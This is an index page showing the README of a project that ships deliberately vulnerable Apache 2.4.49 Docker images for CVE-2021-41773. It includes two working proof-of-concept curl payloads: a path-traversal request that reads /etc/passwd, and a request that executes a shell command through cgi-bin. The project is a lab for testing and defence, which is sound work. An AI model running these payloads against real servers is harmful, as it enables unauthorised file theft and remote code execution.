Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/BlueTeamSteve/CVE-2021-41773

Vulnerable docker images for CVE-2021-41773
https://github.com/BlueTeamSteve/CVE-2021-41773

Last synced: 21 days ago
JSON representation

Vulnerable docker images for CVE-2021-41773

Awesome Lists containing this project

README 

        
# Vulnerable docker images for CVE-2021-41773 Apache path traversal



This vulnerabiltiy *only* applies to version 2.4.49 that have specific non-default configs. In certain situations this can result in either file read or code execution.



![tweet](./img/ptswarm.png)

[https://twitter.com/ptswarm/status/1445376079548624899](https://twitter.com/ptswarm/status/1445376079548624899)



## Vulnerable file read config



Containers can be pulled directly from Docker Hub using



```docker pull blueteamsteve/cve-2021-41773:no-cgid```



and executed using



```docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid```



The Apache logs can be viewed using below, or just exlude the "-dit" from the above run command to stream stdio

```docker logs ```



### PoC for file read



```curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd```



## Vulnerable RCE config



Containers can be pulled directly from Docker Hub using



```docker pull blueteamsteve/cve-2021-41773:with-cgid```



and executed using



```docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid```



The Apache logs can be viewed using below, or just exlude the "-dit" from the above run command to stream stdio

```docker logs ```



### PoC for RCE



```curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'```



## Build custom docker containers



Modify and build your own versions using the dockerfile and template httpd.conf files in the subdirectories



- Use ./no-cgi for the config vulnerable to file read

- Use ./with-cgi for the config vulnerable to code execution